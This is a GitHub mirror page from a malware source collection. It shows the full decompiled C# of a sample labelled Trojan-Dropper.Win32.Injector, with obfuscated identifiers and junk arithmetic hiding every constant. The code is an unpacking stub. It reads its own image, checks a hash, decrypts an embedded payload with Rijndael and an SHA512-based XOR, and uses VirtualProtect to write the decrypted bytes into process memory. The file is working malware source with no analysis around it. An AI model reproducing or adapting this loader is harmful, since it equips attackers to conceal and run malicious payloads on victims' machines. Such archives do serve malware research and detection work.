mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
f2ac1ece55
add
156 lines
11 KiB
C#
156 lines
11 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: 쁽䘑㬢䭎싲<E4AD8E>Ⓑ薢
|
||
// Assembly: scan, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe
|
||
|
||
using System;
|
||
using System.IO;
|
||
using System.Reflection;
|
||
using System.Runtime.InteropServices;
|
||
using System.Security.Cryptography;
|
||
|
||
internal static class 쁽䘑㬢䭎싲\uFFFD\u24B7薢
|
||
{
|
||
[DllImport("kernel32.dll", EntryPoint = "VirtualProtect", PreserveSig = false)]
|
||
private static extern bool 稀\uE109那\u26E8춷㘓㦹꧑(
|
||
IntPtr _param0,
|
||
uint _param1,
|
||
uint _param2,
|
||
out uint _param3);
|
||
|
||
public static unsafe void 믎Յ퀜ᱨ䄺涱㸿ꋶ()
|
||
{
|
||
Module module = typeof (쁽䘑㬢䭎싲\uFFFD\u24B7薢).Module;
|
||
IntPtr hinstance = Marshal.GetHINSTANCE(module);
|
||
if (hinstance == (IntPtr) -1)
|
||
goto label_2;
|
||
label_1:
|
||
Stream input;
|
||
bool flag;
|
||
if (module.FullyQualifiedName == "<Unknown>")
|
||
{
|
||
flag = true;
|
||
input = (Stream) new UnmanagedMemoryStream((byte*) hinstance.ToPointer(), (long) (int) (268435478.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (long) (int) (268435478.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (FileAccess) (26.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
|
||
}
|
||
else
|
||
goto label_5;
|
||
label_4:
|
||
byte[] numArray1;
|
||
byte[] numArray2;
|
||
ulong num1;
|
||
int dstOffset;
|
||
byte[] numArray3;
|
||
int position;
|
||
int count1;
|
||
using (BinaryReader binaryReader = new BinaryReader(input))
|
||
{
|
||
input.Seek((long) (int) (83.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Begin);
|
||
uint offset1 = binaryReader.ReadUInt32();
|
||
input.Seek((long) offset1, SeekOrigin.Begin);
|
||
input.Seek((long) (int) (29.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Current);
|
||
int num2 = (int) binaryReader.ReadUInt16();
|
||
Stream stream = input;
|
||
int num3 = (int) offset1;
|
||
int num4 = (int) (47.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
|
||
uint num5;
|
||
long offset2 = (long) (num5 = (uint) (num3 + num4));
|
||
stream.Seek(offset2, SeekOrigin.Begin);
|
||
int num6 = (int) binaryReader.ReadUInt16();
|
||
input.Seek((long) (int) (85.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Current);
|
||
position = (int) input.Position;
|
||
int count2 = binaryReader.ReadInt32() ^ (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 1945389408.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
|
||
if (count2 == (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 1945389408.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))
|
||
goto label_8;
|
||
label_7:
|
||
input.Seek(0L, SeekOrigin.Begin);
|
||
numArray1 = binaryReader.ReadBytes(count2);
|
||
num1 = binaryReader.ReadUInt64() ^ 8675158181231138756UL;
|
||
dstOffset = binaryReader.ReadInt32();
|
||
count1 = binaryReader.ReadInt32();
|
||
numArray3 = binaryReader.ReadBytes(binaryReader.ReadInt32() ^ (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 74420171.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
|
||
numArray2 = binaryReader.ReadBytes(binaryReader.ReadInt32() ^ (int) (1200253018.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
|
||
goto label_12;
|
||
label_8:
|
||
Environment.FailFast("Broken file");
|
||
goto label_7;
|
||
}
|
||
label_12:
|
||
Buffer.BlockCopy((Array) new byte[(int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)], 0, (Array) numArray1, position, (int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
|
||
if (dstOffset != 0)
|
||
goto label_16;
|
||
label_15:
|
||
byte[] hash = MD5.Create().ComputeHash(numArray1);
|
||
if ((long) (BitConverter.ToUInt64(hash, 0) ^ BitConverter.ToUInt64(hash, (int) (31.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))) != (long) num1)
|
||
goto label_18;
|
||
label_14:
|
||
byte[] src = 쁽䘑㬢䭎싲\uFFFD\u24B7薢.\uE48C鬄უ\u319F\u2A31\u2F8B\uF3C3\u2EE7(numArray1, numArray3, numArray2);
|
||
Buffer.BlockCopy((Array) new byte[numArray1.Length], 0, (Array) numArray1, 0, numArray1.Length);
|
||
if ((int) src[0] != (int) (237.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0) || (int) src[1] != (int) (134.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))
|
||
goto label_17;
|
||
label_13:
|
||
byte[] numArray4 = new byte[src.Length - (int) (25.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)];
|
||
Buffer.BlockCopy((Array) src, (int) (25.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (Array) numArray4, 0, numArray4.Length);
|
||
using (BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream(numArray4)))
|
||
{
|
||
uint length = binaryReader.ReadUInt32();
|
||
int[] numArray5 = new int[(IntPtr) length];
|
||
IntPtr[] numArray6 = new IntPtr[(IntPtr) length];
|
||
for (int index = 0; (long) index < (long) length; ++index)
|
||
{
|
||
uint num7 = binaryReader.ReadUInt32() ^ (uint) (int) (490849795.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
|
||
if (num7 != 0U)
|
||
{
|
||
uint num8 = binaryReader.ReadUInt32() ^ (uint) (int) (490849795.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
|
||
byte[] source = binaryReader.ReadBytes(binaryReader.ReadInt32());
|
||
IntPtr destination = (IntPtr) (long) (uint) ((int) hinstance + (flag ? (int) num7 : (int) num8));
|
||
uint num9;
|
||
쁽䘑㬢䭎싲\uFFFD\u24B7薢.稀\uE109那\u26E8춷㘓㦹꧑(destination, (uint) source.Length, (uint) (int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), out num9);
|
||
Marshal.Copy(source, 0, destination, source.Length);
|
||
쁽䘑㬢䭎싲\uFFFD\u24B7薢.稀\uE109那\u26E8춷㘓㦹꧑(destination, (uint) source.Length, num9, out num9);
|
||
numArray5[index] = source.Length;
|
||
numArray6[index] = destination;
|
||
}
|
||
}
|
||
return;
|
||
}
|
||
label_17:
|
||
Environment.FailFast("Broken file");
|
||
goto label_13;
|
||
label_18:
|
||
Environment.FailFast("Broken file");
|
||
goto label_14;
|
||
label_16:
|
||
Buffer.BlockCopy((Array) new byte[count1], 0, (Array) numArray1, dstOffset, count1);
|
||
goto label_15;
|
||
label_5:
|
||
flag = false;
|
||
input = (Stream) new FileStream(module.FullyQualifiedName, (FileMode) (26.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), FileAccess.Read, FileShare.Read);
|
||
goto label_4;
|
||
label_2:
|
||
Environment.FailFast("Module error");
|
||
goto label_1;
|
||
}
|
||
|
||
private static byte[] \uE48C鬄უ\u319F\u2A31\u2F8B\uF3C3\u2EE7(
|
||
byte[] _param0,
|
||
byte[] _param1,
|
||
byte[] _param2)
|
||
{
|
||
Rijndael rijndael = Rijndael.Create();
|
||
byte[] buffer = new byte[_param2.Length];
|
||
using (CryptoStream cryptoStream = new CryptoStream((Stream) new MemoryStream(_param2), rijndael.CreateDecryptor(SHA256.Create().ComputeHash(_param0), _param1), CryptoStreamMode.Read))
|
||
cryptoStream.Read(buffer, 0, _param2.Length);
|
||
SHA512 shA512 = SHA512.Create();
|
||
byte[] hash = shA512.ComputeHash(_param0);
|
||
for (int offset = 0; offset < buffer.Length; offset += (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))
|
||
{
|
||
int num = buffer.Length <= offset + (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0) ? buffer.Length : offset + (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0);
|
||
for (int index = offset; index < num; ++index)
|
||
buffer[index] ^= (byte) ((int) hash[index - offset] ^ (int) (155.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0));
|
||
hash = shA512.ComputeHash(buffer, offset, num - offset);
|
||
}
|
||
return buffer;
|
||
}
|
||
}
|